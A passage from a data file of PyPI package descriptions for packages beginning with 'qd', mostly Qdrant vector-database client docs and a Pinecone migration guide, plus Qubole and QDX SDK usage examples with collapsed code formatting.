"pacakge-description": "Python Client library for theQdrantvector search engine.Python Qdrant ClientClient library and SDK for theQdrantvector search engine. Python Client API Documentation is availablehere.Library contains type definitions for all Qdrant API and allows to make both Sync and Async requests.Client allows calls for allQdrant API methodsdirectly.\nIt also provides some additional helper methods for frequently required operations, e.g. initial collection uploading.SeeQuickStartfor more details!Installationpip install qdrant-clientFeaturesType hints for all API methodsLocal mode - use same API without running serverREST and gRPC supportMinimal dependenciesExtensive Test CoverageLocal modePython client allows you to run same code in local mode without running Qdrant server.Simply initialize client like this:fromqdrant_clientimportQdrantClientclient=QdrantClient(\":memory:\")# orclient=QdrantClient(path=\"path/to/db\")# Persists changes to diskLocal mode is useful for development, prototyping and testing.You can use it to run tests in your CI/CD pipeline.Run it in Colab or Jupyter Notebook, no extra dependencies required. See anexampleWhen you need to scale, simply switch to server mode.Fast Embeddings + Simpler APIpip install qdrant-client[fastembed]FastEmbed is a library for creating fast vector embeddings on CPU. It is based on ONNX Runtime and allows to run inference on CPU with GPU-like performance.Qdrant Client can use FastEmbed to create embeddings and upload them to Qdrant. This allows to simplify API and make it more intuitive.fromqdrant_clientimportQdrantClient# Initialize the clientclient=QdrantClient(\":memory:\")# or QdrantClient(path=\"path/to/db\")# Prepare your documents, metadata, and IDsdocs=[\"Qdrant has Langchain integrations\",\"Qdrant also has Llama Index integrations\"]metadata=[{\"source\":\"Langchain-docs\"},{\"source\":\"Linkedin-docs\"},]ids=[42,2]# Use the new add methodclient.add(collection_name=\"demo_collection\",documents=docs,metadata=metadata,ids=ids)search_result=client.query(collection_name=\"demo_collection\",query_text=\"This is a query document\")print(search_result)Connect to Qdrant serverTo connect to Qdrant server, simply specify host and port:fromqdrant_clientimportQdrantClientclient=QdrantClient(host=\"localhost\",port=6333)# orclient=QdrantClient(url=\"http://localhost:6333\")You can run Qdrant server locally with docker:dockerrun-p6333:6333qdrant/qdrant:latestSee more launch options inQdrant repository.Connect to Qdrant cloudYou can register and useQdrant Cloudto get a free tier account with 1GB RAM.Once you have your cluster and API key, you can connect to it like this:fromqdrant_clientimportQdrantClientqdrant_client=QdrantClient(url=\"https://xxxxxx-xxxxx-xxxxx-xxxx-xxxxxxxxx.us-east.aws.cloud.qdrant.io:6333\",api_key=\"\",)ExamplesCreate a new collectionfromqdrant_client.modelsimportDistance,VectorParamsclient.recreate_collection(collection_name=\"my_collection\",vectors_config=VectorParams(size=100,distance=Distance.COSINE),)Insert vectors into a collectionimportnumpyasnpfromqdrant_client.modelsimportPointStructvectors=np.random.rand(100,100)client.upsert(collection_name=\"my_collection\",points=[PointStruct(id=idx,vector=vector.tolist(),payload={\"color\":\"red\",\"rand_number\":idx%10})foridx,vectorinenumerate(vectors)])Search for similar vectorsquery_vector=np.random.rand(100)hits=client.search(collection_name=\"my_collection\",query_vector=query_vector,limit=5# Return 5 closest points)Search for similar vectors with filtering conditionfromqdrant_client.modelsimportFilter,FieldCondition,Rangehits=client.search(collection_name=\"my_collection\",query_vector=query_vector,query_filter=Filter(must=[# These conditions are required for search resultsFieldCondition(key='rand_number',# Condition based on values of `rand_number` field.range=Range(gte=3# Select only those results where `rand_number` >= 3))]),limit=5# Return 5 closest points)See more examples in ourDocumentation!gRPCTo enable (typically, much faster) collection uploading with gRPC, use the following initialization:fromqdrant_clientimportQdrantClientclient=QdrantClient(host=\"localhost\",grpc_port=6334,prefer_grpc=True)Async clientStarting from version 1.6.1, all python client methods are available in async version.To use it, just importAsyncQdrantClientinstead ofQdrantClient:fromqdrant_clientimportAsyncQdrantClient,modelsimportnumpyasnpimportasyncioasyncdefmain():# Your async code using QdrantClient might be put hereclient=AsyncQdrantClient(url=\"http://localhost:6333\")awaitclient.create_collection(collection_name=\"my_collection\",vectors_config=models.VectorParams(size=10,distance=models.Distance.COSINE),)awaitclient.upsert(collection_name=\"my_collection\",points=[models.PointStruct(id=i,vector=np.random.rand(10).tolist(),)foriinrange(100)],)res=awaitclient.search(collection_name=\"my_collection\",query_vector=np.random.rand(10).tolist(),# type: ignorelimit=10,)print(res)asyncio.run(main())Both, gRPC and REST API are supported in async mode.\nMore examples can be foundhere.DevelopmentThis project uses git hooks to run code formatters.Installpre-commitwithpip3 install pre-commitand set up hooks withpre-commit install.pre-commit requires python>=3.8"} +{"package": "qdrant-haystack", "pacakge-description": "qdrant-haystackTable of ContentsInstallationLicenseInstallationpip install qdrant-haystackTestingThe test suites use Qdrant's in-memory instance. No additional steps required.hatch run testLicenseqdrant-haystackis distributed under the terms of theApache-2.0license."} +{"package": "qdrant-openapi", "pacakge-description": "API description for Qdrant vector search engine. This document describes CRUD and search operations on collections of points (vectors with payload). Qdrant supports any combinations of `should`, `must` and `must_not` conditions, which makes it possible to use in applications when object could not be described solely by vector. It could be location features, availability flags, and other custom properties businesses should take into account. ## Examples This examples cover the most basic use-cases - collection creation and basic vector search. ### Create collection First - let's create a collection with dot-production metric. ``` curl -X PUT 'http://localhost:6333/collections/test_collection' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "vectors": { "size": 4, "distance": "Dot" } }' ``` Expected response: ``` { "result": true, "status": "ok", "time": 0.031095451 } ``` We can ensure that collection was created: ``` curl 'http://localhost:6333/collections/test_collection' ``` Expected response: ``` { "result": { "status": "green", "vectors_count": 0, "segments_count": 5, "disk_data_size": 0, "ram_data_size": 0, "config": { "params": { "vectors": { "size": 4, "distance": "Dot" } }, "hnsw_config": { "m": 16, "ef_construct": 100, "full_scan_threshold": 10000 }, "optimizer_config": { "deleted_threshold": 0.2, "vacuum_min_vector_number": 1000, "max_segment_number": 5, "memmap_threshold": 50000, "indexing_threshold": 20000, "flush_interval_sec": 1 }, "wal_config": { "wal_capacity_mb": 32, "wal_segments_ahead": 0 } } }, "status": "ok", "time": 2.1199e-05 } ``` ### Add points Let's now add vectors with some payload: ``` curl -L -X PUT 'http://localhost:6333/collections/test_collection/points?wait=true' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "points": [ {"id": 1, "vector": [0.05, 0.61, 0.76, 0.74], "payload": {"city": "Berlin"}}, {"id": 2, "vector": [0.19, 0.81, 0.75, 0.11], "payload": {"city": ["Berlin", "London"] }}, {"id": 3, "vector": [0.36, 0.55, 0.47, 0.94], "payload": {"city": ["Berlin", "Moscow"] }}, {"id": 4, "vector": [0.18, 0.01, 0.85, 0.80], "payload": {"city": ["London", "Moscow"] }}, {"id": 5, "vector": [0.24, 0.18, 0.22, 0.44], "payload": {"count": [0]}}, {"id": 6, "vector": [0.35, 0.08, 0.11, 0.44]} ] }' ``` Expected response: ``` { "result": { "operation_id": 0, "status": "completed" }, "status": "ok", "time": 0.000206061 } ``` ### Search with filtering Let's start with a basic request: ``` curl -L -X POST 'http://localhost:6333/collections/test_collection/points/search' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "vector": [0.2,0.1,0.9,0.7], "top": 3 }' ``` Expected response: ``` { "result": [ { "id": 4, "score": 1.362, "payload": null, "version": 0 }, { "id": 1, "score": 1.273, "payload": null, "version": 0 }, { "id": 3, "score": 1.208, "payload": null, "version": 0 } ], "status": "ok", "time": 0.000055785 } ``` But result is different if we add a filter: ``` curl -L -X POST 'http://localhost:6333/collections/test_collection/points/search' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "filter": { "should": [ { "key": "city", "match": { "value": "London" } } ] }, "vector": [0.2, 0.1, 0.9, 0.7], "top": 3 }' ``` Expected response: ``` { "result": [ { "id": 4, "score": 1.362, "payload": null, "version": 0 }, { "id": 2, "score": 0.871, "payload": null, "version": 0 } ], "status": "ok", "time": 0.000093972 } ```"} +{"package": "qdrant-tools", "pacakge-description": "Migrating from Pinecone to Qdrant Vector Database: A Comprehensive GuideInstallationpipinstallqdrant-toolsUsagefromqdrant_tools.vectordbimportPineconeExport,QdrantImportindex_name=\"hindi-search\"# Existing Pinecone index name# Init Pineconepinecone_export=PineconeExport(index_name=index_name)vector_ids=[\"1\",\"2\",\"3\",\"4\",\"5\"]# Example vector idspoints_information=pinecone_export.fetch_vectors(vector_ids)print(points_information[\"ids\"],points_information[\"index_dimension\"])# Init Qdrantqdrant=QdrantImport(**points_information)qdrant.create_collection()qdrant.upsert_vectors()# Trying it out!response=qdrant.qdrant_client.search(collection_name=index_name,query_vector=# vector to search of same dimension as other vectors,)print(response)IntroductionAre you considering a transition from Pinecone to Qdrant? If so, this article will guide you through the process, outlining the similarities and differences between the two systems, and providing a step-by-step migration plan.Understanding the TerminologyBefore diving into the migration process, it's important to familiarize yourself with some key terms.Pinecone TerminologyCollection: A collection in Pinecone is a static snapshot of the index, signifying a unique set of vectors with attached metadata. Qdrant also has a similar concept, referred to as a collection.Index: An index in Pinecone is the principal organizational unit for vector data. It receives and stores vectors, provides query services, and performs various vector operations. It's similar to the concept of an index in Qdrant.Pods: Pinecone uses pods, which are pre-configured hardware units, to host and execute its services. More pods typically result in greater storage capacity, reduced latency, and improved throughput. The Qdrant equivalent is yet to be determined.Qdrant TerminologyCollection: A collection in Qdrant is a named set of points, where each point is a vector with an associated payload. The concept is similar to a collection in Pinecone.Payload: Qdrant allows additional information to be stored with vectors, referred to as a payload. This corresponds to the concept of associated metadata in Pinecone.Points: A point in Qdrant is a record composed of a vector and an optional payload, which closely corresponds to the concept of vectors in Pinecone.To help visualize these concepts, here is a comparison table:Vector DatabasePineconeQdrantDB Capacity/PerfPodClusterCollectionSnapshot of the IndexNamed set of pointsIndexIndexCollectionVectorVectorPointMetadataMetadataPayloadNamespaceOne namespace per vectorNone. However, indexing is possibleSize40KB metadata limitNo default. Size can be set during collection creation/updation for vectors. No payload limitPlanning Your MigrationMigrating from Pinecone to Qdrant involves a series of well-planned steps to ensure that the transition is smooth and disruption-free. Here is a suggested migration plan:Understanding Qdrant(1 week): It's important to first get a solid grasp of Qdrant, its functions, and its APIs. Take time to understand how to establish collections, add points, and query these collections.Migration strategy(2 weeks): Create a comprehensive migration strategy, incorporating data migration (copying your vectors and associated metadata from Pinecone to Qdrant), feature migration (verifying the availability and setting up of features currently in use with Pinecone in Qdrant), and a contingency plan (should there be any unexpected issues).Establishing a parallel Qdrant system(1 week): Set up a Qdrant system to run concurrently with your current Pinecone system. This step will let you begin testing Qdrant without disturbing your ongoing operations on Pinecone.Data migration(2-3 weeks): Shift your vectors and metadata from Pinecone to Qdrant. The timeline for this step could vary, depending on the size of your data and Pinecone API's rate limitations.Testing and transition(2 weeks): Following the data migration, thoroughly test the Qdrant system. Once you're assured of the Qdrant system's stability and performance, you can make the switch.Monitoring and fine-tuning(ongoing): After transitioning to Qdrant, maintain a close watch on its performance. It's key to continue refining the system for optimal results as needed.Bear in mind, these are just rough timelines, and the actual time taken can vary based on the specifics of your setup and the complexity of the migration.Streamlining Data and Embedding MigrationCopying vectors and metadata from your existing Pinecone index is achievable with the fetch operation in Pinecone. This operation retrieves vectors by their ID from the index, bringing along their vector data and/or metadata. Typically, the fetch latency falls below 5ms (source).On the other hand, Qdrant organizes its data into collections. Each collection is a named set of points - vectors coupled with a payload - which can be queried. The vectors in a collection share the same dimensionality and are compared using a single metric (source).fromqdrant_clientimportQdrantClientfromqdrant_client.modelsimportDistance,VectorParamsclient=QdrantClient(host=\"localhost\",port=6333)client.recreate_collection(collection_name=\"my_collection\",vectors_config=VectorParams(size=100,distance=Distance.COSINE),)The migration from Pinecone to Qdrant involves a two-step process of exporting data from Pinecone and subsequently importing that data into Qdrant.Navigating Pinecone Export RestrictionsData extraction from Pinecone must adhere to certain restrictions:Queries: For the parametertop_k, denoting the number of results to return, the maximum value is 10,000. However, if the optionsinclude_metadata=Trueorinclude_data=Trueare utilized, thetop_kvalue reduces to a maximum of 1,000.Fetch and Delete: The ceiling for the number of vectors per fetch or delete request is 1,000.Metadata: The upper limit for metadata size per vector is 40 KB. Pinecone does not support null metadata values, and metadata exhibiting high cardinality may cause the pods to reach capacity.Onboarding Data into QdrantIn Qdrant, data is expected in float format. The process of importing data into Qdrant involves the creation of a collection and then indexing the data, described in the steps below:Creating a Collection: In Qdrant, a collection is a named set of points (vectors with a payload) among which you can search. All vectors within a collection should share the same dimensionality and be comparable by a single metric.You can instantiate a collection by sending a PUT request to/collections/{collection_name}, furnished with necessary parameters including the collection name and the dimensions of vectors.Indexing Data: Once the collection is established, data can be indexed into it. This process can be streamlined by implementing a class likeSearchClient, that encompasses methods for data conversion, indexing, and searching. Theindexmethod within this class should prepare data in the required format and employ the Qdrant client'supsertfunction to index the data.Testing your applications post-migrationPost-migration, it is important to validate your applications with both Pinecone and Qdrant.For Qdrant, the following actions can help test your applications:Creating a Collection: This can be achieved using therecreate_collectionmethod, which sets up a collection with specified parameters such as vector size and distance metric.Inserting Vectors: Vectors can be inserted into your collection using theupsertmethod. Along with the vectors, you can also add associated metadata, referred to as payload in Qdrant.Querying Vectors: Thesearchmethod can be used to find similar vectors within the collection. Qdrant also supports advanced queriesRemember, these are ideas that you can start with. Your actual testing scope may be larger based on the specifics of your application.Performance ConsiderationsCost and Network LatencyOne of the primary considerations when choosing a vector database system is cost and network latency.Pinecone recommends operating within known limits and deploying your application in the same region as your Pinecone service for optimal performance. For users on the Free plan, Pinecone runs in GCP US-West (Oregon).On the other hand, Qdrant is an open-source vector database that can be self-hosted, providing more flexibility. It can be deployed in your own environment, which can help optimize network latency and potentially lower costs.Throughput and SpeedPinecone suggests increasing the number of replicas for your index to increase throughput (QPS). It also provides a gRPC client that can offer higher upsert speeds for multi-pod indexes. However, be aware that reads and writes cannot be performed in parallel in Pinecone, which means that writing in large batches might affect query latencyQdrant, on the other hand, offers different performance profiles2based on your specific use case:Low memory footprint with high speed search: Qdrant achieves this by keeping vectors on disk and minimizing the number of disk reads. You can make this even better by configuring in-memory quantization, with on-disk original vectors.Vector quantization can be used to achieve this by converting vectors into a more compact representation, which can be stored in memory and used for search.Below is an example of how to configure this in Python:fromqdrant_clientimportQdrantClientfromqdrant_client.httpimportmodelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),quantization_config=models.ScalarQuantization(scalar=models.ScalarQuantizationConfig(type=models.ScalarType.INT8,always_ram=True,),),)High precision with low memory footprint: For scenarios where high precision is required but RAM is limited, you can enable on-disk vectors and HNSW index. Here is an example of how to configure this in Python:fromqdrant_clientimportQdrantClient,modelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),hnsw_config=models.HnswConfigDiff(on_disk=True))High precision with high speed search: If you want high speed and high precision search, Qdrant can achieve this by keeping as much data in RAM as possible and applying quantization with re-scoring. Here is an example of how to configure this in Python:fromqdrant_clientimportQdrantClientfromqdrant_client.httpimportmodelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),quantization_config=models.ScalarQuantization(scalar=models.ScalarQuantizationConfig(type=models.ScalarType.INT8,always_ram=True,),),)There are also search/query time changes you can make to influence Qdrant's performance characteristics:fromqdrant_clientimportQdrantClient,modelsclient=QdrantClient(\"localhost\",port=6333)client.search(collection_name=\"{collection_name}\",search_params=models.SearchParams(hnsw_ef=128,exact=False),query_vector=[0.2,0.1,0.9,0.7],limit=3,)Overall, Qdrant's flexibility allows for a wide range of performance tuning options to suit various use cases, which could make it a better option for those looking for a customizable vector database.Please note that when tuning for performance, you must consider your specific use case, infrastructure, and workload characteristics. The suggested configurations are starting points and may need to be adjusted based on actual performance observations and requirements.PineconeHere are some tips for getting the best performance out ofPinecone.Security ConsiderationsQdrantQdrant takes a unique approach to security that is minimalist yet flexible, allowing for robust security configurations tailored to each unique deployment environment:Environment-level Security: Qdrant is designed to be deployed in secure environments, such as Kubernetes with Network Policies or a Virtual Private Cloud (VPC). This approach puts the control of security aspects in the hands of the deployer, allowing for custom security measures tailored to the specific needs of the deployment environment. If you're using Qdrant Cloud, it also uses API keys for authentication. Ensure these keys are securely managed.Data Encryption: While Qdrant does not support built-in data encryption, it leaves the choice of encryption strategy to the underlying storage service. This allows for a wide variety of encryption methods to be employed depending on the specific storage solution used, providing greater flexibility.Authentication: Qdrant's can be easily integrated with any existing authentication system at the service level, such as a reverse proxy. This allows for seamless integration with existing infrastructure without the need for modifications to accommodate a built-in authentication system.Network Security: Qdrant leaves network security to be handled at the environment level. This approach allows for a wide range of network security configurations to be employed depending on the specific needs of the deployment environment.Reporting Security Issues: Qdrant encourages the reporting of any security-related issues to their dedicated security email, demonstrating their commitment to ongoing security improvements.PineconeAuthentication: Pinecone requires a valid API key and environment pair for accessing its services, which can be a limiting factor if integration with an existing authentication system is desired.Data and Network Safeguards: Pinecone runs on a fully managed and secure AWS infrastructure, which may not provide the flexibility required for some deployment scenarios.Compliance and Certifications: While Pinecone's SOC2 Type II certification and GDPR-readiness are reassuring, they may not be sufficient for some organizations who want to work strictly within their VPC. This means deploying an on-premise of Pinecone under enterprise offering, which can be prohibitively expensive for some organizations.\u00dfSecurity Policies and Practices: Pinecone's rigorous security policies may not align with the security practices of all organizations. This also moves the burden of finding the difference between the security policies and ironing them out to the end user.Incident Management and Monitoring: Pinecone's incident management and monitoring practices are not integrated with the organisation's existing incident management and monitoring systems, potentially complicating incident response.In conclusion, Qdrant's minimalist approach to security allows for greater flexibility and customization according to the specific needs of the deployment environment. It puts the control of security measures in the hands of the deployer, allowing for robust, tailored security configurations. On the other hand, Pinecone's built-in security measures and compliance certifications provide a comprehensive, ready-to-use security solution that may not provide the same level of customization as Qdrant. The choice between the two depends largely on the specific security needs of your application and the flexibility of your deployment environment."} +{"package": "qdrant-txtai", "pacakge-description": "qdrant-txtaitxtaisimplifies building AI-powered semantic\nsearch applications using Transformers. It leverages the neural embeddings and\ntheir properties to encode high-dimensional data in a lower-dimensional space\nand allows to find similar objects based on their embeddings' proximity.Implementing such application in real-world use cases requires storing the\nembeddings in an efficient way though, namely in a vector database likeQdrant. It offers not only a powerful engine for neural\nsearch, but also allows setting up a whole cluster if your data does not fit\na single machine anymore. It is production grade and can be launched easily\nwith Docker.Combining the easiness of txtai with Qdrant's performance enables you to build\nproduction-ready semantic search applications way faster than before.InstallationThe library might be installed with pip as following:pipinstallqdrant-txtaiUsageRunning the txtai application with Qdrant as a vector storage requires launching\na Qdrant instance. That might be done easily with Docker:dockerrun-p6333:6333-p:6334:6334qdrant/qdrant:v1.0.1Running the txtai application might be done either programmatically or by\nproviding configuration in a YAML file.Programmaticallyfromtxtai.embeddingsimportEmbeddingsembeddings=Embeddings({\"path\":\"sentence-transformers/all-MiniLM-L6-v2\",\"backend\":\"qdrant_txtai.ann.qdrant.Qdrant\",})embeddings.index([(0,\"Correct\",None),(1,\"Not what we hoped\",None)])result=embeddings.search(\"positive\",1)print(result)Via YAML configuration# app.ymlembeddings:path:sentence-transformers/all-MiniLM-L6-v2backend:qdrant_txtai.ann.qdrant.QdrantCONFIG=app.ymluvicorn\"txtai.api:app\"curl-XGET\"http://localhost:8000/search?query=positive\"Configuration propertiesqdrant-txtaiallows you to configure both the connection details, and some\ninternal properties of the vector collection which may impact both speed and\naccuracy. Please refer toQdrant docsif you are interested in the meaning of each property.The example below presents all the available options, if we connect to Qdrant server:embeddings:path:sentence-transformers/all-MiniLM-L6-v2backend:qdrant_txtai.ann.qdrant.Qdrantmetric:l2# allowed values: l2 / cosine / ipqdrant:url:qdrant.hostport:6333grpc_port:6334prefer_grpc:truecollection:CustomCollectionNamehttps:true# for Qdrant Cloudapi_key:XYZ# for Qdrant Cloudhnsw:m:8ef_construct:256full_scan_threshold:ef_search:512Local in-memory/disk-persisted modeQdrant Python client, from version 1.1.1, supports local in-memory/disk-persisted mode.\nThat's a good choice for any test scenarios and quick experiments in which you do not\nplan to store lots of vectors. In such a case spinning a Docker container might be even\nnot required.In-memory storageIn case you want to have a transient storage, for example in case of automated tests\nlaunched during your CI/CD pipeline, using Qdrant Local mode with in-memory storage\nmight be a preferred option.embeddings:path:sentence-transformers/all-MiniLM-L6-v2backend:qdrant_txtai.ann.qdrant.Qdrantmetric:l2# allowed values: l2 / cosine / ipqdrant:location:':memory:'prefer_grpc:trueOn disk storageHowever, if you prefer to keep the vectors between different runs of your application,\nit might be better to use on disk storage and pass the path that should be used to\npersist the data.embeddings:path:sentence-transformers/all-MiniLM-L6-v2backend:qdrant_txtai.ann.qdrant.Qdrantmetric:l2# allowed values: l2 / cosine / ipqdrant:path:'/home/qdrant/storage_local'prefer_grpc:true"} +{"package": "qdrant-utils", "pacakge-description": "qdrant-utilsDescribe your project here."} +{"package": "qdrouter-jinja2", "pacakge-description": "UNKNOWN"} +{"package": "qds_app", "pacakge-description": "# qds_app\nA Python egg to support migrations in your project[![Build Status](https://travis-ci.org/vrajat/qds_app.svg?branch=master)](https://travis-ci.org/vrajat/qds_app)"} +{"package": "qdscreen", "pacakge-description": "qdscreenRemove redundancy in your categorical variables and increase your models performance.qdscreenis a python implementation of the Quasi-determinism screening algorithm from T.Rahier's PhD thesis, 2018.The documentation for users is available here:https://python-qds.github.io/qdscreen/A readme for developers is available here:https://github.com/python-qds/qdscreen"} +{"package": "qdsl", "pacakge-description": "OverviewMake digging around in nests of python dicts and lists less tedious.OptimizationsIntern node names so the strings aren't duplicated. This saves a huge amount of memory, especially for things like openshift resources.Desugar/compile queries into regular python functions, special casing where possible.Generate regular python functions from Boolean ASTs passed to queries. The \"compilation\" takes microseconds.Query the entire flattened tree at once in \"find\" since it's equivalent to querying individual nodes and accumulating.Simplify the where API so we don't need a separate WhereBoolean hierarchy.Use tuples instead of lists for values and children. Tuples are slightly smaller.Branch \"value\" defaults to an empty tuple. Since it's a default keyword value, all instances share the same one.Use slots."} +{"package": "qds_sdk", "pacakge-description": "A Python module that provides the tools you need to authenticate with,\nand use the Qubole Data Service API.InstallationFrom PyPIThe SDK is available onPyPI.$ pip install qds-sdkFrom sourceGet the source code:Either clone the project:git clonegit@github.com:qubole/qds-sdk-py.gitand checkout latest release tag fromReleases.Or download one of the releases fromhttps://github.com/qubole/qds-sdk-py/releasesRun the following command (may need to do this as root):$ python setup.py installAlternatively, if you use virtualenv, you can do this:$ cd qds-sdk-py\n$ virtualenv venv\n$ source venv/bin/activate\n$ python setup.py installThis should place a command line utilityqds.pysomewhere in your\npath$ which qds.py\n/usr/bin/qds.pyCLIqds.pyallows running Hive, Hadoop, Pig, Presto and Shell commands\nagainst QDS. Users can run commands synchronously - or submit a command\nand check its status.$ qds.py -h # will print detailed usageExamples:run a hive query and print the results$ qds.py --token 'xxyyzz' hivecmd run --query \"show tables\"\n$ qds.py --token 'xxyyzz' hivecmd run --script_location /tmp/myquery\n$ qds.py --token 'xxyyzz' hivecmd run --script_location s3://my-qubole-location/myquerypass in api token from bash environment variable$ export QDS_API_TOKEN=xxyyzzrun the example hadoop command$ qds.py hadoopcmd run streaming -files 's3n://paid-qubole/HadoopAPIExamples/WordCountPython/mapper.py,s3n://paid-qubole/HadoopAPIExamples/WordCountPython/reducer.py' -mapper mapper.py -reducer reducer.py -numReduceTasks 1 -input 's3n://paid-qubole/default-datasets/gutenberg' -output 's3n://example.bucket.com/wcout'check the status of command # 12345678$ qds.py hivecmd check 12345678\n{\"status\": \"done\", ... }If you are hitting api_url other than api.qubole.com, then you can pass it in command line as--urlor set in as env variable$ qds.py --token 'xxyyzz' --url https://.qubole.com/api hivecmd ...\n\nor\n\n$ export QDS_API_URL=https://.qubole.com/apiSDK APIAn example Python application needs to do the following:Set the api_token and api_url (if api_url other than api.qubole.com):from qds_sdk.qubole import Qubole\n\nQubole.configure(api_token='ksbdvcwdkjn123423')\n\n# or\n\nQubole.configure(api_token='ksbdvcwdkjn123423', api_url='https://.qubole.com/api')Use the Command classes defined in commands.py to execute commands.\nTo run Hive Command:from qds_sdk.commands import *\n\nhc=HiveCommand.create(query='show tables')\nprint \"Id: %s, Status: %s\" % (str(hc.id), hc.status)example/mr_1.pycontains a Hadoop Streaming exampleReporting Bugs and Contributing CodeWant to report a bug or request a feature? Please openan issue.Want to contribute? Fork the project and create a pull request with your changes againstunreleasedbranch."} +{"package": "qdts-client", "pacakge-description": "No description available on PyPI."} +{"package": "qdts-node", "pacakge-description": "No description available on PyPI."} +{"package": "qdts-orchestrator", "pacakge-description": "No description available on PyPI."} +{"package": "qdudomportal", "pacakge-description": "Project: qdudomportal-----------------------Project History: qdudomportal-----------------------"} +{"package": "qdune", "pacakge-description": "# qduneTools for processing raw (point cloud) multibeam bathymetric surveys of\nmigrating bed forms."} +{"package": "qdupe", "pacakge-description": "UNKNOWN"} +{"package": "qduTAportal", "pacakge-description": "Project: qduTAportal-----------------------Project History: qduTAportal------------------------ 2015-05-12- Modify: use json save user info- 2015-04-18- Add: auto logout every 14 minutes- Add: if the account may be used, try logout first, then login again- Fix Bug: catch Heart Beat Error- 2015-04-12- Fix bug: login confition: checkAccess Index First- 2015-04-02- if it failed to connect portal, then sleep 10 seconds, try again.- 2015-03-19- fix bug: never do evil --> baidu.com- fix bug: connect 172.20.1.1 failed- 2015-03-10- rewrite Portal.checkLogin Function.- add some menus"} +{"package": "qdutils", "pacakge-description": "No description available on PyPI."} +{"package": "qdvis", "pacakge-description": "qdvis (Quick Data Visualizer)This is a tool to easily visualize the logs when long time processing is required by simply starting up a local server.Installationpip install qdvisUsageExmaple of code. Let the log be added to the writer object anywhere in the code (e.g., loop).fromqdvis.writerimportLogWriterwriter=LogWriter()num_epochs=10forepochinrange(num_epochs):forinputs,targetsindata_loader:outputs=model(inputs)loss=criterion(outputs,targets)optimizer.zero_grad()loss.backward()optimizer.step()print(f\"Epoch{epoch+1}/{num_epochs}, Loss:{loss.item()}\")writer.add_scalar(x_value=epoch,y_value=loss.item())You can start a terminal and launch a local server for visualization with theqdviscommand.qdvis --logpath ./logs/log.json --port 8000--logpath: path for log file.--port: port of local server.Methodsgpu utilization can be added to the logadd_scaler(x_value, y_value)Parametersx_value(float): x scaler value of 2D chart.y_value(float): y scaler value of 2D chart.2D chart can be added to the logadd_gpu_status()"} +{"package": "qdx", "pacakge-description": "QDX-py: Python SDK for the QDX APIThis package exposes a simple provider and CLI for the different tools exposed by the QDX GraphQL API.UsageAs a libraryimportjsonfrompathlibimportPathimportqdxfromqdx.dataimportrun_convert,QDXV1QCMol,QDXV1QCInputURL=\"url to the qdx api\"TOKEN=\"your qdx access token\"# get our client to talk with the APIclient=qdx.QDXProvider(url=URL,access_token=TOKEN)# path to protein pdb with correct charges and protonationprotein_pdb=Path(\"./examples/4w9f_prepared_protein.pdb\")# path to ligand sdf with correct charges and protonationligand_sdf=Path(\"./examples/3JU_prepared.sdf\")# convert pdb to qdxfprotein_qdxf=client.obabel_to_complex(file=protein_pdb,format=\"pdb\")# convert ligand sdf to qdxfligand_qdxf=client.obabel_to_complex(file=ligand_sdf,format=\"sdf\")# We need to treat the ligand as a single fragmentligand_qdxf[\"topology\"][\"fragments\"]=[[xforx,_inenumerate(ligand_qdxf[\"topology\"][\"symbols\"])]]ligand_qdxf[\"topology\"][\"fragment_charges\"]=[0]# We also need to drop connectivity information (temporary)ligand_qdxf[\"topology\"][\"connectivity\"]=[]# fragment proteinfragged_protein=client.fragment_complex(protein_qdxf,backbone_steps=5)# combine fragmented protein and ligand into a single complexcomplex=client.combine_complexes(fragged_protein,ligand_qdxf)# create a qdx/hermes input file for complexqdx_input=qdx.data.run_convert(json.dumps(complex),\"qdxcomplex2qdxv1\")# Configure input for lattice calculationqdx_input.model.fragmentation=Trueqdx_input.keywords.frag.lattice_energy_calc=True# The reference monomer should be the final fragment,# as that will be the ligandqdx_input.keywords.frag.reference_monomer=len(qdx_input.molecule.fragments)-1qdx_input.keywords.frag.monomer_cutoff=20qdx_input.keywords.frag.dimer_cutoff=10qdx_input.model.method=\"RIMP2\"# Start hermes calculation -# remember to set tags that reference your systemproc=client.start_quantum_energy_calculation(qdx_input,tags=[\"rimp2\",\"4w9f\",\"3ju\",\"manual_prep\",\"debug_charges\"])# Fetch results - you will have to run this multiple times until# the calculation is doneresult=client.get_proc(proc)As a CLI# All cli calls have these standard arguments, referred to as \u2026 in future examplesqdx--urlQDX_API_URL--access-tokenQDX_ACCESS_TOKEN# Post a hermes job, returning a task id\u2026--post-quantum-energy<./path_to_qdxv1_input.json# Retrieve the hermes job, or its progress\u2026--get-procTASK_ID## Other functions# Return a qdx complex json object and save it as complex.json\u2026--pdb-to-complexPATH_TO_PDB_FILE>complex.json# Prepare a protein for quauntum energy calculation\u2026--prepare-proteinsimulation--poll<./complex.json>prepped_protein_complex.json# Fragment a qdx complex json object\u2026--fragment-complex[MIN_STEPS_ALONG_PROTEIN_BACKBONE_BEFORE_CUTTING_AT_C-C_BOND]fragmented_protein_complex.json# Prepare a ligand for quauntum energy calculation\u2026--prepare-ligandsimulation--poll<./path_to_ligand.sdf>prepped_ligand_complex.json# Combine protein and ligand complexes for simulation\u2026--combine-complexes./prepped_protein_complex.json<./prepped_ligand_complex.sdf>protein_ligand_complex.json# Convert a qdx complex into a qdx input file\u2026--convert./protein_ligand_complex.json--directionqdxcomplex2qdxv1>qdx_input.json# Convert a qdx complex into a exess input file\u2026--convert./protein_ligand_complex.json--directionqdxcomplex2exess>exess_input.json# Convert a qdx input file into an exess input file\u2026--convertqdx_input.json--directionqdxv12exess>exess_input.json"} +{"package": "qdx-py", "pacakge-description": "QDX-pyPython bindings to qdx-commons, built withmaturin / py03.NAME\n qdx_py - QDX-Common utilities for python\n\nPACKAGE CONTENTS\n 